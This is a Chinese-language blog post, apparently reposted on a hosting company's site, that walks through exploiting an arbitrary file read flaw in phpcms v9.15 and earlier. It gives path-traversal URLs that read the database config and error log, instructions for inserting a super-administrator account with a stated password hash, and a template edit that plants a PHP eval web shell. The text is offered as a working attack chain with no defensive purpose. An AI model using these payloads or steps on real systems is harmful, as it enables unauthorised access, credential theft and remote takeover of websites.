溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

phpcmsv9.15以下任意文件讀取漏洞

發布時間:2020-07-10 17:52:19 來源:網絡 閱讀:1940 作者:KBK影院 欄目:web開發 

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php

成功讀取數據庫信息如下:
phpcmsv9.15以下任意文件讀取漏洞 

爆網站路徑:

http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/error_log.php



phpcmsv9.15以下任意文件讀取漏洞 


打開phpcmsV9數據庫并且找到admin表,向表中添加一條數據,因為我們沒法破解他的密碼那么咱們就自己

添加一個用戶以便能夠登錄后臺操作:

Username:admin password: 748b4dfa3a7159c1eb1baa46f222f9b8 roleid:1 encrypt:C6mB9p

注意這幾項必須添負責登錄不了的。應為這條記錄的意思是添加用戶名為admin,密碼為:creturn.com的超級管理員



phpcmsv9.15以下任意文件讀取漏洞 

后臺登錄地址:localhost/index.php?m=admin

用戶名:admin 密碼:creturn.com

登錄后臺后我們找到界面-》模版風格-》選擇默認模版點擊詳情列表

phpcmsv9.15以下任意文件讀取漏洞 

然后點擊里面的search目錄下面的index.html右側的編輯

phpcmsv9.15以下任意文件讀取漏洞 

修改其模版為:

  1. <?php $shell = '<?php @eval($_POST[cmd]);?>';file_put_contents('shell.php',$shell);?>

復制代碼

提交保存

然后訪問:localhost/index.php?m=search

會在根目錄生成一個shell.php的一句話,我們連接看看

phpcmsv9.15以下任意文件讀取漏洞 

可以看到已經拿到shell,記得把修改的模版改回去。

或者可以直接通過mysql數據庫及爆出的路徑寫一句話

向AI問一下細節
推薦閱讀:
  1. TEC-004-php文件下載任意文件讀取漏洞修復
  2. 任意文件讀取與下載

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

phpcms

猜你喜歡

最新資訊
相關推薦

相關標簽

php7.1 index.php php時間 php字符串函數 msgpack-php php_curl php命令 php四舍五入 php程序員 禁止解析php php探針 phpexcel php插件 php-cli phpnow php升級 php編碼 php調試 php面向 php編程語言
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女